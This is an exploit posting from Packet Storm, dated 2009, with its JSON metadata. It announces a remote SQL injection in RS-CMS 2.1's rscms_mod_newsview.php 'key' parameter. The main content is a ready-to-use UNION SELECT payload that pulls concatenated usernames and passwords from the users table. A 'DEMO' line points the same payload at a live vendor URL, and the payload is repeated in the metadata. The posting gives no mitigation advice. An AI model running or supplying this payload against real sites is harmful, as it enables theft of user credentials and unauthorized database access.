ID PACKETSTORM:78581
Type packetstorm
Reporter Mr.tro0oqy
Modified 2009-06-23T00:00:00
Description
`=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability
[+] Found by : Mr.tro0oqy
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
BUGS
====
Sql Injections:
rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
DEMO
====
http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
all my Friends
`
{"type": "packetstorm", "published": "2009-06-23T00:00:00", "reporter": "Mr.tro0oqy", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9e705ae2f928ce46285cebf433bbb728"}, {"key": "modified", "hash": "f6c00f8c32e5b87209961f5eb393d75a"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "f6c00f8c32e5b87209961f5eb393d75a"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "162fc043ec12cc84096f739c8d5b806c"}, {"key": "sourceData", "hash": "a8bffef648e886b6b5172de388c0d282"}, {"key": "sourceHref", "hash": "6baf541a8e6b35f559f9627a19d111c8"}, {"key": "title", "hash": "60652895b2a59138016de85726154e0f"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`======================================================= \n+++++++++++++++++++ information +++++++++++++++++++++++ \n======================================================= \n[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability \n \n[+] Found by : Mr.tro0oqy \n \n[+] C0ntact : t.4@windowslive.com <Yemeni ana> \n======================================================= \n+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ \n======================================================= \nBUGS \n==== \n \nSql Injections: \nrscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users-- \n \nDEMO \n==== \nhttp://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users-- \n \n \n======================================================= \n++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ \n======================================================= \nall my Friends \n \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:18:39", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/78581/RS-CMS-2.1-SQL-Injection.html", "sourceHref": "https://packetstormsecurity.com/files/download/78581/rscms-sql.txt", "title": "RS-CMS 2.1 SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:78581", "hash": "8deda011588b263db6a10ea59eddc27208f8a24cd747a327947ace316a5232d6", "edition": 1, "cvelist": [], "modified": "2009-06-23T00:00:00", "description": ""}
{}
